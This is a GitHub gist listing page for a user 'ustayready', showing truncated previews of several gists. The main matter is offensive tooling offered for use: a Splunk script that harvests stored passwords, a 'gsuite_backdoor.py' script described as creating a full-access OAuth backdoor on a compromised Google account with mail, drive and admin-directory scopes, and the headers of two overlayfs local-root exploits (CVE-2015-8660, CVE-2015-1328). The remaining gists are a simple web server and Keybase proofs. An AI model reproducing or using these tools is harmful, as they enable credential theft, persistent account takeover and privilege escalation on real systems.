Skip to content

Instantly share code, notes, and snippets.

View ustayready's full-sized avatar

ustayready ustayready

696 followers · 10 following
View GitHub Profile
@ustayready
ustayready / Splunk Secrets
Created December 16, 2019 05:31
import splunk.entity as entity
import splunk.auth, splunk.search
import getpass
def huntPasswords(sessionKey):
entities = entity.getEntities(
['admin','passwords'],owner="nobody", namespace="-",sessionKey=sessionKey)
return entities
def getSessionKeyFromCreds():
user = raw_input("Username:")
password = getpass.getpass()
@ustayready
ustayready / Quick Python 3 Web Server
Last active August 11, 2021 17:31
import http.server
import socketserver
import logging
import sys
class GetHandler(http.server.SimpleHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
@ustayready
ustayready / gsuite_backdoor.py
Last active October 12, 2022 06:21
Quickly create a full-access backdoor on Google accounts by creating a Google API project at https://cloud.google.com/console, save the client_secrets.json into the same folder and then run the script below. It will print a URL for you to access with a browser that has the compromised Google account session active so you can authorize the applic…
#!/usr/bin/env python
import os
from oauth2client import client, tools
from oauth2client.file import Storage
SCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user'
def get_credentials():
credential_dir =os.getcwd()
client_secret_path = os.path.join(credential_dir, 'client_secrets.json')
@ustayready
ustayready / keybase.md
Last active October 13, 2017 17:15

Keybase proof

I hereby claim:

  • I am ustayready on github.
  • I am ustayready (https://keybase.io/ustayready) on keybase.
  • I have a public key whose fingerprint is 7F79 D6BC 6A18 549A 62AB 9D36 C9C5 8E41 0323 33BC

To claim this, I am signing this object:

@ustayready
ustayready / overlay2.c
Created February 4, 2016 21:00
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
@ustayready
ustayready / overlay
Created February 4, 2016 20:58
/*
just another overlayfs exploit, works on kernels before 2015-12-26
# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660
@ustayready
ustayready / c
Created February 4, 2016 20:53
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
@ustayready
ustayready / keybase.md
Created March 30, 2015 21:25

Keybase proof

I hereby claim:

  • I am stayready on github.
  • I am stayready (https://keybase.io/stayready) on keybase.
  • I have a public key whose fingerprint is 8F04 63FD 0365 E5A2 C9F5 4826 DDAA 7416 230C 6BFF

To claim this, I am signing this object: